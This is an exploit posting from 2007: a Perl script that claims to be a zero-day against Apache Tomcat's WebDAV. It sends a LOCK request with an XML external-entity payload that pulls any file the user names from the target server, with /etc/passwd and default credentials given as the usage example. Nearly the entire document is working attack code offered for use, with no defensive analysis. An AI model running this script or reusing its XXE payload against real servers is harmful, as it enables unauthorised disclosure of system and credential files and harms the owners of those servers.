apache-disclose.txt
Posted on 16 October 2007
#!/usr/bin/perl #****************************************************** # Apache Tomcat Remote File Disclosure Zeroday Xploit # kcdarookie aka eliteb0y / 2007 # # thanx to the whole team & andi :) # +++KEEP PRIV8+++ # # This Bug may reside in different WebDav implementations, # Warp your mind! # +You will need auth for the exploit to work... #****************************************************** use IO::Socket; use MIME::Base64; ### FIXME! Maybe support other auths too ? # SET REMOTE PORT HERE $remoteport = 8080; sub usage { print "Apache Tomcat Remote File Disclosure Zeroday Xploit "; print "kcdarookie aka eliteb0y / 2007 "; print "usage: perl TOMCATXPL <remotehost> <webdav file> <file to retrieve> [username] [password] "; print "example: perl TOMCATXPL www.hostname.com /webdav /etc/passwd tomcat tomcat ";exit; } if ($#ARGV < 2) {usage();} $hostname = $ARGV[0]; $webdavfile = $ARGV[1]; $remotefile = $ARGV[2]; $username = $ARGV[3]; $password = $ARGV[4]; my $sock = IO::Socket::INET->new(PeerAddr => $hostname, PeerPort => $remoteport, Proto => 'tcp'); $|=1; $BasicAuth = encode_base64("$username:$password"); $KRADXmL = "<?xml version="1.0"?> " ."<!DOCTYPE REMOTE [ " ."<!ENTITY RemoteX SYSTEM "$remotefile"> " ."]> " ."<D:lockinfo xmlns:D='DAV:'> " ."<D:lockscope><D:exclusive/></D:lockscope> " ."<D:locktype><D:write/></D:locktype> " ."<D:owner> " ."<D:href> " ."<REMOTE> " ."<RemoteX>&RemoteX;</RemoteX> " ."</REMOTE> " ."</D:href> " ."</D:owner> " ."</D:lockinfo> "; print "Apache Tomcat Remote File Disclosure Zeroday Xploit "; print "kcdarookie aka eliteb0y / 2007 "; print "Launching Remote Exploit... "; $ExploitRequest = "LOCK $webdavfile HTTP/1.1 " ."Host: $hostname "; if ($username ne "") { $ExploitRequest .= "Authorization: Basic $BasicAuth "; } $ExploitRequest .= "Content-Type: text/xml Content-Length: ".length($KRADXmL)." " . $KRADXmL; print $sock $ExploitRequest; while(<$sock>) { print; }